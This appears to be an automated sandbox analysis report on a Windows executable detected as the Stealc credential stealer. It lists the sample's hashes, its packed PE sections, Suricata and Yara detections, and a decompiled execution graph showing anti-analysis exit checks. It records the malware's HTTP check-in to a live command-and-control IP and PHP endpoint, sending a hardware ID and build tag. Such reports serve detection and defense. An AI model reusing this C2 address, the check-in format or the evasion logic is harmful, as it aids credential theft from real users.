                  Cookbook Comments:
                  • Found application associated with file extension: .exe
                  • Stop behavior analysis, all processes terminated

                  Warnings

                  • Report size getting too big, too many NtQueryValueKey calls found.

                  Simulations

                  Behavior and APIs

                  No simulations

                  Joe Sandbox View / Context

                  IPs

                  MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                  185.215.113.37file.exeGet hashmaliciousStealcBrowse
                  • 185.215.113.37/e2b1563c6670f193.php
                  file.exeGet hashmaliciousStealc, VidarBrowse
                  • 185.215.113.37/e2b1563c6670f193.php
                  file.exeGet hashmaliciousStealcBrowse
                  • 185.215.113.37/e2b1563c6670f193.php
                  file.exeGet hashmaliciousStealcBrowse
                  • 185.215.113.37/e2b1563c6670f193.php
                  file.exeGet hashmaliciousRDPWrap Tool, Amadey, Socks5Systemz, Stealc, Vidar, XmrigBrowse
                  • 185.215.113.37/e2b1563c6670f193.php
                  file.exeGet hashmaliciousStealcBrowse
                  • 185.215.113.37/e2b1563c6670f193.php
                  file.exeGet hashmaliciousStealcBrowse
                  • 185.215.113.37/e2b1563c6670f193.php
                  file.exeGet hashmaliciousStealc, VidarBrowse
                  • 185.215.113.37/e2b1563c6670f193.php
                  file.exeGet hashmaliciousStealcBrowse
                  • 185.215.113.37/e2b1563c6670f193.php
                  file.exeGet hashmaliciousStealcBrowse
                  • 185.215.113.37/e2b1563c6670f193.php

                  Domains

                  No context

                  ASNs

                  MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                  WHOLESALECONNECTIONSNLfile.exeGet hashmaliciousStealcBrowse
                  • 185.215.113.37
                  file.exeGet hashmaliciousStealc, VidarBrowse
                  • 185.215.113.37
                  file.exeGet hashmaliciousStealcBrowse
                  • 185.215.113.37
                  file.exeGet hashmaliciousStealcBrowse
                  • 185.215.113.37
                  file.exeGet hashmaliciousRDPWrap Tool, Amadey, Socks5Systemz, Stealc, Vidar, XmrigBrowse
                  • 185.215.113.43
                  file.exeGet hashmaliciousStealcBrowse
                  • 185.215.113.37
                  file.exeGet hashmaliciousStealcBrowse
                  • 185.215.113.37
                  file.exeGet hashmaliciousStealc, VidarBrowse
                  • 185.215.113.37
                  file.exeGet hashmaliciousStealcBrowse
                  • 185.215.113.37
                  file.exeGet hashmaliciousStealcBrowse
                  • 185.215.113.37

                  JA3 Fingerprints

                  No context

                  Dropped Files

                  No context

                  Created / dropped Files

                  No created / dropped files found

                  Static File Info

                  General

                  File type:PE32 executable (GUI) Intel 80386, for MS Windows
                  Entropy (8bit):7.951230291721707
                  TrID:
                  • Win32 Executable (generic) a (10002005/4) 99.96%
                  • Generic Win/DOS Executable (2004/3) 0.02%
                  • DOS Executable Generic (2002/1) 0.02%
                  • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                  File name:file.exe
                  File size:1'846'272 bytes
                  MD5:93db12453ac29ad390cbd66f4b6dfd52
                  SHA1:14dc9072be488c339f9c2bbc3711d9793bb7218b
                  SHA256:afd87eeb51cb2bd9ed4b52f0151ddf1f540d6c9fffb433eab0063c7edf1d093f
                  SHA512:e6bcafe83356e62d24be04888c7b303cf7d873a2363dca7759602ff2f3b04193999e20499d70d12a46356e33da3f4193d583b462160f8bf3f57d1ca62274fe65
                  SSDEEP:24576:bmihk7ZuwYJ+DCdrYD/dqwE2rXMp7kJ/6u6X0yfDAghh4V9OgYX1OzckEg8tvzWJ:hkzcygNkJCuViQ9xDE9anp0pRs/DcW1
                  TLSH:9F853333312E905FE829B53A1CFF530325E3CA11C1A699B4BC6F1A7D1E0D2D9E19E819
                  File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........C..............X.......m.......Y.......p.....y.........`...............\.......n.....Rich............PE..L...J..f...........

                  File Icon

                  Icon Hash:90cececece8e8eb0

                  Static PE Info

                  General

                  Entrypoint:0xa9a000
                  Entrypoint Section:.taggant
                  Digitally signed:false
                  Imagebase:0x400000
                  Subsystem:windows gui
                  Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                  DLL Characteristics:DYNAMIC_BASE, TERMINAL_SERVER_AWARE
                  Time Stamp:0x66F99A4A [Sun Sep 29 18:19:54 2024 UTC]
                  TLS Callbacks:
                  CLR (.Net) Version:
                  OS Version Major:5
                  OS Version Minor:1
                  File Version Major:5
                  File Version Minor:1
                  Subsystem Version Major:5
                  Subsystem Version Minor:1
                  Import Hash:2eabe9054cad5152567f0699947a2c5b

                  Entrypoint Preview

                  Instruction
                  jmp 00007FB9C84F3CAAh

                  Rich Headers

                  Programming Language:
                  • [C++] VS2010 build 30319
                  • [ASM] VS2010 build 30319
                  • [ C ] VS2010 build 30319
                  • [ C ] VS2008 SP1 build 30729
                  • [IMP] VS2008 SP1 build 30729
                  • [LNK] VS2010 build 30319

                  Data Directories

                  NameVirtual AddressVirtual Size Is in Section
                  IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                  IMAGE_DIRECTORY_ENTRY_IMPORT0x25d0500x64.idata
                  IMAGE_DIRECTORY_ENTRY_RESOURCE0x00x0
                  IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                  IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                  IMAGE_DIRECTORY_ENTRY_BASERELOC0x25d1f80x8.idata
                  IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                  IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                  IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                  IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                  IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                  IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                  IMAGE_DIRECTORY_ENTRY_IAT0x00x0
                  IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                  IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                  IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                  Sections

                  NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                  0x10000x25b0000x22800ad8a4a57d7dd56efbf9a17d0adbe4a4cunknownunknownunknownunknownIMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                  .rsrc 0x25c0000x10000x0d41d8cd98f00b204e9800998ecf8427eFalse0empty0.0IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                  .idata 0x25d0000x10000x200c60c4959cc8d384ac402730cc6842bb0False0.1328125data0.9064079259880791IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                  0x25e0000x29e0000x200b2d88feca93f03b01307f45a2dcc3795unknownunknownunknownunknownIMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                  bgdhafsv0x4fc0000x19d0000x19ca007b77b8360aab0524f538c163188d9f9eFalse0.9946423668963951data7.952703648524724IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                  xszuyfga0x6990000x10000x400279043e52a0f705de5fced6602e16f29False0.7880859375data6.201469284257068IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                  .taggant0x69a0000x30000x22002fa7b6d6f70a7836e659824e45119147False0.38522518382352944DOS executable (COM)4.196042803354581IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE

                  Imports

                  DLLImport
                  kernel32.dlllstrcpy

                  Network Behavior

                  Suricata IDS Alerts

                  TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                  2024-10-04T04:41:07.170847+02002044243ET MALWARE [SEKOIA.IO] Win32/Stealc C2 Check-in1192.168.2.449730185.215.113.3780TCP

                  Network Port Distribution

                  TCP Packets

                  TimestampSource PortDest PortSource IPDest IP
                  Oct 4, 2024 04:41:06.250785112 CEST4973080192.168.2.4185.215.113.37
                  Oct 4, 2024 04:41:06.257237911 CEST8049730185.215.113.37192.168.2.4
                  Oct 4, 2024 04:41:06.257421017 CEST4973080192.168.2.4185.215.113.37
                  Oct 4, 2024 04:41:06.257903099 CEST4973080192.168.2.4185.215.113.37
                  Oct 4, 2024 04:41:06.267934084 CEST8049730185.215.113.37192.168.2.4
                  Oct 4, 2024 04:41:06.945116997 CEST8049730185.215.113.37192.168.2.4
                  Oct 4, 2024 04:41:06.945193052 CEST4973080192.168.2.4185.215.113.37
                  Oct 4, 2024 04:41:06.948136091 CEST4973080192.168.2.4185.215.113.37
                  Oct 4, 2024 04:41:06.952996016 CEST8049730185.215.113.37192.168.2.4
                  Oct 4, 2024 04:41:07.170490026 CEST8049730185.215.113.37192.168.2.4
                  Oct 4, 2024 04:41:07.170846939 CEST4973080192.168.2.4185.215.113.37
                  Oct 4, 2024 04:41:09.957885981 CEST4973080192.168.2.4185.215.113.37

                  HTTP Request Dependency Graph

                  • 185.215.113.37

                  HTTP Packets

                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                  0192.168.2.449730185.215.113.37806756C:\Users\user\Desktop\file.exe
                  TimestampBytes transferredDirectionData
                  Oct 4, 2024 04:41:06.257903099 CEST89OUTGET / HTTP/1.1
                  Host: 185.215.113.37
                  Connection: Keep-Alive
                  Cache-Control: no-cache
                  Oct 4, 2024 04:41:06.945116997 CEST203INHTTP/1.1 200 OK
                  Date: Fri, 04 Oct 2024 02:41:06 GMT
                  Server: Apache/2.4.52 (Ubuntu)
                  Content-Length: 0
                  Keep-Alive: timeout=5, max=100
                  Connection: Keep-Alive
                  Content-Type: text/html; charset=UTF-8
                  Oct 4, 2024 04:41:06.948136091 CEST412OUTPOST /e2b1563c6670f193.php HTTP/1.1
                  Content-Type: multipart/form-data; boundary=----BKKFHIEGDHJKECAAKKEB
                  Host: 185.215.113.37
                  Content-Length: 211
                  Connection: Keep-Alive
                  Cache-Control: no-cache
                  Data Raw: 2d 2d 2d 2d 2d 2d 42 4b 4b 46 48 49 45 47 44 48 4a 4b 45 43 41 41 4b 4b 45 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 42 39 34 34 41 32 33 39 43 45 32 32 32 38 33 38 34 32 30 38 31 30 0d 0a 2d 2d 2d 2d 2d 2d 42 4b 4b 46 48 49 45 47 44 48 4a 4b 45 43 41 41 4b 4b 45 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 22 0d 0a 0d 0a 64 6f 6d 61 0d 0a 2d 2d 2d 2d 2d 2d 42 4b 4b 46 48 49 45 47 44 48 4a 4b 45 43 41 41 4b 4b 45 42 2d 2d 0d 0a
                  Data Ascii: ------BKKFHIEGDHJKECAAKKEBContent-Disposition: form-data; name="hwid"B944A239CE222838420810------BKKFHIEGDHJKECAAKKEBContent-Disposition: form-data; name="build"doma------BKKFHIEGDHJKECAAKKEB--
                  Oct 4, 2024 04:41:07.170490026 CEST210INHTTP/1.1 200 OK
                  Date: Fri, 04 Oct 2024 02:41:07 GMT
                  Server: Apache/2.4.52 (Ubuntu)
                  Content-Length: 8
                  Keep-Alive: timeout=5, max=99
                  Connection: Keep-Alive
                  Content-Type: text/html; charset=UTF-8
                  Data Raw: 59 6d 78 76 59 32 73 3d
                  Data Ascii: YmxvY2s=


                  Statistics

                  CPU Usage

                  Click to jump to process

                  Memory Usage

                  Click to jump to process

                  High Level Behavior Distribution

                  Click to dive into process behavior distribution

                  System Behavior

                  General

                  Target ID:0
                  Start time:22:41:02
                  Start date:03/10/2024
                  Path:C:\Users\user\Desktop\file.exe
                  Wow64 process (32bit):true
                  Commandline:"C:\Users\user\Desktop\file.exe"
                  Imagebase:0x630000
                  File size:1'846'272 bytes
                  MD5 hash:93DB12453AC29AD390CBD66F4B6DFD52
                  Has elevated privileges:true
                  Has administrator privileges:true
                  Programmed in:C, C++ or other language
                  Yara matches:
                  • Rule: JoeSecurity_Stealc, Description: Yara detected Stealc, Source: 00000000.00000003.1746371608.0000000005000000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                  • Rule: JoeSecurity_Stealc, Description: Yara detected Stealc, Source: 00000000.00000002.1787435060.000000000142E000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                  • Rule: JoeSecurity_Stealc, Description: Yara detected Stealc, Source: 00000000.00000002.1786637155.0000000000631000.00000040.00000001.01000000.00000003.sdmp, Author: Joe Security
                  Reputation:low
                  Has exited:true

                  Disassembly

                  Reset < >

                    Execution Graph

                    Execution Coverage:9.8%
                    Dynamic/Decrypted Code Coverage:0%
                    Signature Coverage:9.7%
                    Total number of Nodes:2000
                    Total number of Limit Nodes:24
                    execution_graph 13274 6469f0 13319 632260 13274->13319 13298 646a64 13299 64a9b0 4 API calls 13298->13299 13300 646a6b 13299->13300 13301 64a9b0 4 API calls 13300->13301 13302 646a72 13301->13302 13303 64a9b0 4 API calls 13302->13303 13304 646a79 13303->13304 13305 64a9b0 4 API calls 13304->13305 13306 646a80 13305->13306 13471 64a8a0 13306->13471 13308 646b0c 13475 646920 GetSystemTime 13308->13475 13309 646a89 13309->13308 13311 646ac2 OpenEventA 13309->13311 13314 646af5 CloseHandle Sleep 13311->13314 13315 646ad9 13311->13315 13317 646b0a 13314->13317 13318 646ae1 CreateEventA 13315->13318 13317->13309 13318->13308 13672 6345c0 13319->13672 13321 632274 13322 6345c0 2 API calls 13321->13322 13323 63228d 13322->13323 13324 6345c0 2 API calls 13323->13324 13325 6322a6 13324->13325 13326 6345c0 2 API calls 13325->13326 13327 6322bf 13326->13327 13328 6345c0 2 API calls 13327->13328 13329 6322d8 13328->13329 13330 6345c0 2 API calls 13329->13330 13331 6322f1 13330->13331 13332 6345c0 2 API calls 13331->13332 13333 63230a 13332->13333 13334 6345c0 2 API calls 13333->13334 13335 632323 13334->13335 13336 6345c0 2 API calls 13335->13336 13337 63233c 13336->13337 13338 6345c0 2 API calls 13337->13338 13339 632355 13338->13339 13340 6345c0 2 API calls 13339->13340 13341 63236e 13340->13341 13342 6345c0 2 API calls 13341->13342 13343 632387 13342->13343 13344 6345c0 2 API calls 13343->13344 13345 6323a0 13344->13345 13346 6345c0 2 API calls 13345->13346 13347 6323b9 13346->13347 13348 6345c0 2 API calls 13347->13348 13349 6323d2 13348->13349 13350 6345c0 2 API calls 13349->13350 13351 6323eb 13350->13351 13352 6345c0 2 API calls 13351->13352 13353 632404 13352->13353 13354 6345c0 2 API calls 13353->13354 13355 63241d 13354->13355 13356 6345c0 2 API calls 13355->13356 13357 632436 13356->13357 13358 6345c0 2 API calls 13357->13358 13359 63244f 13358->13359 13360 6345c0 2 API calls 13359->13360 13361 632468 13360->13361 13362 6345c0 2 API calls 13361->13362 13363 632481 13362->13363 13364 6345c0 2 API calls 13363->13364 13365 63249a 13364->13365 13366 6345c0 2 API calls 13365->13366 13367 6324b3 13366->13367 13368 6345c0 2 API calls 13367->13368 13369 6324cc 13368->13369 13370 6345c0 2 API calls 13369->13370 13371 6324e5 13370->13371 13372 6345c0 2 API calls 13371->13372 13373 6324fe 13372->13373 13374 6345c0 2 API calls 13373->13374 13375 632517 13374->13375 13376 6345c0 2 API calls 13375->13376 13377 632530 13376->13377 13378 6345c0 2 API calls 13377->13378 13379 632549 13378->13379 13380 6345c0 2 API calls 13379->13380 13381 632562 13380->13381 13382 6345c0 2 API calls 13381->13382 13383 63257b 13382->13383 13384 6345c0 2 API calls 13383->13384 13385 632594 13384->13385 13386 6345c0 2 API calls 13385->13386 13387 6325ad 13386->13387 13388 6345c0 2 API calls 13387->13388 13389 6325c6 13388->13389 13390 6345c0 2 API calls 13389->13390 13391 6325df 13390->13391 13392 6345c0 2 API calls 13391->13392 13393 6325f8 13392->13393 13394 6345c0 2 API calls 13393->13394 13395 632611 13394->13395 13396 6345c0 2 API calls 13395->13396 13397 63262a 13396->13397 13398 6345c0 2 API calls 13397->13398 13399 632643 13398->13399 13400 6345c0 2 API calls 13399->13400 13401 63265c 13400->13401 13402 6345c0 2 API calls 13401->13402 13403 632675 13402->13403 13404 6345c0 2 API calls 13403->13404 13405 63268e 13404->13405 13406 649860 13405->13406 13677 649750 GetPEB 13406->13677 13408 649868 13409 649a93 LoadLibraryA LoadLibraryA LoadLibraryA LoadLibraryA LoadLibraryA 13408->13409 13410 64987a 13408->13410 13411 649af4 GetProcAddress 13409->13411 13412 649b0d 13409->13412 13413 64988c 21 API calls 13410->13413 13411->13412 13414 649b46 13412->13414 13415 649b16 GetProcAddress GetProcAddress 13412->13415 13413->13409 13416 649b4f GetProcAddress 13414->13416 13417 649b68 13414->13417 13415->13414 13416->13417 13418 649b71 GetProcAddress 13417->13418 13419 649b89 13417->13419 13418->13419 13420 646a00 13419->13420 13421 649b92 GetProcAddress GetProcAddress 13419->13421 13422 64a740 13420->13422 13421->13420 13423 64a750 13422->13423 13424 646a0d 13423->13424 13425 64a77e lstrcpy 13423->13425 13426 6311d0 13424->13426 13425->13424 13427 6311e8 13426->13427 13428 631217 13427->13428 13429 63120f ExitProcess 13427->13429 13430 631160 GetSystemInfo 13428->13430 13431 631184 13430->13431 13432 63117c ExitProcess 13430->13432 13433 631110 GetCurrentProcess VirtualAllocExNuma 13431->13433 13434 631141 ExitProcess 13433->13434 13435 631149 13433->13435 13678 6310a0 VirtualAlloc 13435->13678 13438 631220 13682 6489b0 13438->13682 13441 631249 13442 63129a 13441->13442 13443 631292 ExitProcess 13441->13443 13444 646770 GetUserDefaultLangID 13442->13444 13445 646792 13444->13445 13446 6467d3 13444->13446 13445->13446 13447 6467b7 ExitProcess 13445->13447 13448 6467c1 ExitProcess 13445->13448 13449 6467a3 ExitProcess 13445->13449 13450 6467ad ExitProcess 13445->13450 13451 6467cb ExitProcess 13445->13451 13452 631190 13446->13452 13453 6478e0 3 API calls 13452->13453 13454 63119e 13453->13454 13455 6311cc 13454->13455 13456 647850 3 API calls 13454->13456 13459 647850 GetProcessHeap RtlAllocateHeap GetUserNameA 13455->13459 13457 6311b7 13456->13457 13457->13455 13458 6311c4 ExitProcess 13457->13458 13460 646a30 13459->13460 13461 6478e0 GetProcessHeap RtlAllocateHeap GetComputerNameA 13460->13461 13462 646a43 13461->13462 13463 64a9b0 13462->13463 13684 64a710 13463->13684 13465 64a9c1 lstrlen 13467 64a9e0 13465->13467 13466 64aa18 13685 64a7a0 13466->13685 13467->13466 13469 64a9fa lstrcpy lstrcat 13467->13469 13469->13466 13470 64aa24 13470->13298 13472 64a8bb 13471->13472 13473 64a90b 13472->13473 13474 64a8f9 lstrcpy 13472->13474 13473->13309 13474->13473 13689 646820 13475->13689 13477 64698e 13478 646998 sscanf 13477->13478 13718 64a800 13478->13718 13480 6469aa SystemTimeToFileTime SystemTimeToFileTime 13481 6469e0 13480->13481 13482 6469ce 13480->13482 13484 645b10 13481->13484 13482->13481 13483 6469d8 ExitProcess 13482->13483 13485 645b1d 13484->13485 13486 64a740 lstrcpy 13485->13486 13487 645b2e 13486->13487 13720 64a820 lstrlen 13487->13720 13490 64a820 2 API calls 13491 645b64 13490->13491 13492 64a820 2 API calls 13491->13492 13493 645b74 13492->13493 13724 646430 13493->13724 13496 64a820 2 API calls 13497 645b93 13496->13497 13498 64a820 2 API calls 13497->13498 13499 645ba0 13498->13499 13500 64a820 2 API calls 13499->13500 13501 645bad 13500->13501 13502 64a820 2 API calls 13501->13502 13503 645bf9 13502->13503 13733 6326a0 13503->13733 13511 645cc3 13512 646430 lstrcpy 13511->13512 13513 645cd5 13512->13513 13514 64a7a0 lstrcpy 13513->13514 13515 645cf2 13514->13515 13516 64a9b0 4 API calls 13515->13516 13517 645d0a 13516->13517 13518 64a8a0 lstrcpy 13517->13518 13519 645d16 13518->13519 13520 64a9b0 4 API calls 13519->13520 13521 645d3a 13520->13521 13522 64a8a0 lstrcpy 13521->13522 13523 645d46 13522->13523 13524 64a9b0 4 API calls 13523->13524 13525 645d6a 13524->13525 13526 64a8a0 lstrcpy 13525->13526 13527 645d76 13526->13527 13528 64a740 lstrcpy 13527->13528 13529 645d9e 13528->13529 14459 647500 GetWindowsDirectoryA 13529->14459 13532 64a7a0 lstrcpy 13533 645db8 13532->13533 14469 634880 13533->14469 13535 645dbe 14614 6417a0 13535->14614 13537 645dc6 13538 64a740 lstrcpy 13537->13538 13539 645de9 13538->13539 13540 631590 lstrcpy 13539->13540 13541 645dfd 13540->13541 14630 635960 13541->14630 13543 645e03 14774 641050 13543->14774 13545 645e0e 13546 64a740 lstrcpy 13545->13546 13547 645e32 13546->13547 13548 631590 lstrcpy 13547->13548 13549 645e46 13548->13549 13550 635960 34 API calls 13549->13550 13551 645e4c 13550->13551 14778 640d90 13551->14778 13553 645e57 13554 64a740 lstrcpy 13553->13554 13555 645e79 13554->13555 13556 631590 lstrcpy 13555->13556 13557 645e8d 13556->13557 13558 635960 34 API calls 13557->13558 13559 645e93 13558->13559 14785 640f40 13559->14785 13561 645e9e 13562 631590 lstrcpy 13561->13562 13563 645eb5 13562->13563 14790 641a10 13563->14790 13565 645eba 13566 64a740 lstrcpy 13565->13566 13567 645ed6 13566->13567 15134 634fb0 GetProcessHeap RtlAllocateHeap InternetOpenA 13567->15134 13569 645edb 13570 631590 lstrcpy 13569->13570 13571 645f5b 13570->13571 15141 640740 13571->15141 13573 645f60 13574 64a740 lstrcpy 13573->13574 13575 645f86 13574->13575 13576 631590 lstrcpy 13575->13576 13577 645f9a 13576->13577 13578 635960 34 API calls 13577->13578 13579 645fa0 13578->13579 13673 6345d1 RtlAllocateHeap 13672->13673 13676 634621 VirtualProtect 13673->13676 13676->13321 13677->13408 13679 6310c2 ctype 13678->13679 13680 6310fd 13679->13680 13681 6310e2 VirtualFree 13679->13681 13680->13438 13681->13680 13683 631233 GlobalMemoryStatusEx 13682->13683 13683->13441 13684->13465 13686 64a7c2 13685->13686 13687 64a7ec 13686->13687 13688 64a7da lstrcpy 13686->13688 13687->13470 13688->13687 13690 64a740 lstrcpy 13689->13690 13691 646833 13690->13691 13692 64a9b0 4 API calls 13691->13692 13693 646845 13692->13693 13694 64a8a0 lstrcpy 13693->13694 13695 64684e 13694->13695 13696 64a9b0 4 API calls 13695->13696 13697 646867 13696->13697 13698 64a8a0 lstrcpy 13697->13698 13699 646870 13698->13699 13700 64a9b0 4 API calls 13699->13700 13701 64688a 13700->13701 13702 64a8a0 lstrcpy 13701->13702 13703 646893 13702->13703 13704 64a9b0 4 API calls 13703->13704 13705 6468ac 13704->13705 13706 64a8a0 lstrcpy 13705->13706 13707 6468b5 13706->13707 13708 64a9b0 4 API calls 13707->13708 13709 6468cf 13708->13709 13710 64a8a0 lstrcpy 13709->13710 13711 6468d8 13710->13711 13712 64a9b0 4 API calls 13711->13712 13713 6468f3 13712->13713 13714 64a8a0 lstrcpy 13713->13714 13715 6468fc 13714->13715 13716 64a7a0 lstrcpy 13715->13716 13717 646910 13716->13717 13717->13477 13719 64a812 13718->13719 13719->13480 13721 64a83f 13720->13721 13722 645b54 13721->13722 13723 64a87b lstrcpy 13721->13723 13722->13490 13723->13722 13725 64a8a0 lstrcpy 13724->13725 13726 646443 13725->13726 13727 64a8a0 lstrcpy 13726->13727 13728 646455 13727->13728 13729 64a8a0 lstrcpy 13728->13729 13730 646467 13729->13730 13731 64a8a0 lstrcpy 13730->13731 13732 645b86 13731->13732 13732->13496 13734 6345c0 2 API calls 13733->13734 13735 6326b4 13734->13735 13736 6345c0 2 API calls 13735->13736 13737 6326d7 13736->13737 13738 6345c0 2 API calls 13737->13738 13739 6326f0 13738->13739 13740 6345c0 2 API calls 13739->13740 13741 632709 13740->13741 13742 6345c0 2 API calls 13741->13742 13743 632736 13742->13743 13744 6345c0 2 API calls 13743->13744 13745 63274f 13744->13745 13746 6345c0 2 API calls 13745->13746 13747 632768 13746->13747 13748 6345c0 2 API calls 13747->13748 13749 632795 13748->13749 13750 6345c0 2 API calls 13749->13750 13751 6327ae 13750->13751 13752 6345c0 2 API calls 13751->13752 13753 6327c7 13752->13753 13754 6345c0 2 API calls 13753->13754 13755 6327e0 13754->13755 13756 6345c0 2 API calls 13755->13756 13757 6327f9 13756->13757 13758 6345c0 2 API calls 13757->13758 13759 632812 13758->13759 13760 6345c0 2 API calls 13759->13760 13761 63282b 13760->13761 13762 6345c0 2 API calls 13761->13762 13763 632844 13762->13763 13764 6345c0 2 API calls 13763->13764 13765 63285d 13764->13765 13766 6345c0 2 API calls 13765->13766 13767 632876 13766->13767 13768 6345c0 2 API calls 13767->13768 13769 63288f 13768->13769 13770 6345c0 2 API calls 13769->13770 13771 6328a8 13770->13771 13772 6345c0 2 API calls 13771->13772 13773 6328c1 13772->13773 13774 6345c0 2 API calls 13773->13774 13775 6328da 13774->13775 13776 6345c0 2 API calls 13775->13776 13777 6328f3 13776->13777 13778 6345c0 2 API calls 13777->13778 13779 63290c 13778->13779 13780 6345c0 2 API calls 13779->13780 13781 632925 13780->13781 13782 6345c0 2 API calls 13781->13782 13783 63293e 13782->13783 13784 6345c0 2 API calls 13783->13784 13785 632957 13784->13785 13786 6345c0 2 API calls 13785->13786 13787 632970 13786->13787 13788 6345c0 2 API calls 13787->13788 13789 632989 13788->13789 13790 6345c0 2 API calls 13789->13790 13791 6329a2 13790->13791 13792 6345c0 2 API calls 13791->13792 13793 6329bb 13792->13793 13794 6345c0 2 API calls 13793->13794 13795 6329d4 13794->13795 13796 6345c0 2 API calls 13795->13796 13797 6329ed 13796->13797 13798 6345c0 2 API calls 13797->13798 13799 632a06 13798->13799 13800 6345c0 2 API calls 13799->13800 13801 632a1f 13800->13801 13802 6345c0 2 API calls 13801->13802 13803 632a38 13802->13803 13804 6345c0 2 API calls 13803->13804 13805 632a51 13804->13805 13806 6345c0 2 API calls 13805->13806 13807 632a6a 13806->13807 13808 6345c0 2 API calls 13807->13808 13809 632a83 13808->13809 13810 6345c0 2 API calls 13809->13810 13811 632a9c 13810->13811 13812 6345c0 2 API calls 13811->13812 13813 632ab5 13812->13813 13814 6345c0 2 API calls 13813->13814 13815 632ace 13814->13815 13816 6345c0 2 API calls 13815->13816 13817 632ae7 13816->13817 13818 6345c0 2 API calls 13817->13818 13819 632b00 13818->13819 13820 6345c0 2 API calls 13819->13820 13821 632b19 13820->13821 13822 6345c0 2 API calls 13821->13822 13823 632b32 13822->13823 13824 6345c0 2 API calls 13823->13824 13825 632b4b 13824->13825 13826 6345c0 2 API calls 13825->13826 13827 632b64 13826->13827 13828 6345c0 2 API calls 13827->13828 13829 632b7d 13828->13829 13830 6345c0 2 API calls 13829->13830 13831 632b96 13830->13831 13832 6345c0 2 API calls 13831->13832 13833 632baf 13832->13833 13834 6345c0 2 API calls 13833->13834 13835 632bc8 13834->13835 13836 6345c0 2 API calls 13835->13836 13837 632be1 13836->13837 13838 6345c0 2 API calls 13837->13838 13839 632bfa 13838->13839 13840 6345c0 2 API calls 13839->13840 13841 632c13 13840->13841 13842 6345c0 2 API calls 13841->13842 13843 632c2c 13842->13843 13844 6345c0 2 API calls 13843->13844 13845 632c45 13844->13845 13846 6345c0 2 API calls 13845->13846 13847 632c5e 13846->13847 13848 6345c0 2 API calls 13847->13848 13849 632c77 13848->13849 13850 6345c0 2 API calls 13849->13850 13851 632c90 13850->13851 13852 6345c0 2 API calls 13851->13852 13853 632ca9 13852->13853 13854 6345c0 2 API calls 13853->13854 13855 632cc2 13854->13855 13856 6345c0 2 API calls 13855->13856 13857 632cdb 13856->13857 13858 6345c0 2 API calls 13857->13858 13859 632cf4 13858->13859 13860 6345c0 2 API calls 13859->13860 13861 632d0d 13860->13861 13862 6345c0 2 API calls 13861->13862 13863 632d26 13862->13863 13864 6345c0 2 API calls 13863->13864 13865 632d3f 13864->13865 13866 6345c0 2 API calls 13865->13866 13867 632d58 13866->13867 13868 6345c0 2 API calls 13867->13868 13869 632d71 13868->13869 13870 6345c0 2 API calls 13869->13870 13871 632d8a 13870->13871 13872 6345c0 2 API calls 13871->13872 13873 632da3 13872->13873 13874 6345c0 2 API calls 13873->13874 13875 632dbc 13874->13875 13876 6345c0 2 API calls 13875->13876 13877 632dd5 13876->13877 13878 6345c0 2 API calls 13877->13878 13879 632dee 13878->13879 13880 6345c0 2 API calls 13879->13880 13881 632e07 13880->13881 13882 6345c0 2 API calls 13881->13882 13883 632e20 13882->13883 13884 6345c0 2 API calls 13883->13884 13885 632e39 13884->13885 13886 6345c0 2 API calls 13885->13886 13887 632e52 13886->13887 13888 6345c0 2 API calls 13887->13888 13889 632e6b 13888->13889 13890 6345c0 2 API calls 13889->13890 13891 632e84 13890->13891 13892 6345c0 2 API calls 13891->13892 13893 632e9d 13892->13893 13894 6345c0 2 API calls 13893->13894 13895 632eb6 13894->13895 13896 6345c0 2 API calls 13895->13896 13897 632ecf 13896->13897 13898 6345c0 2 API calls 13897->13898 13899 632ee8 13898->13899 13900 6345c0 2 API calls 13899->13900 13901 632f01 13900->13901 13902 6345c0 2 API calls 13901->13902 13903 632f1a 13902->13903 13904 6345c0 2 API calls 13903->13904 13905 632f33 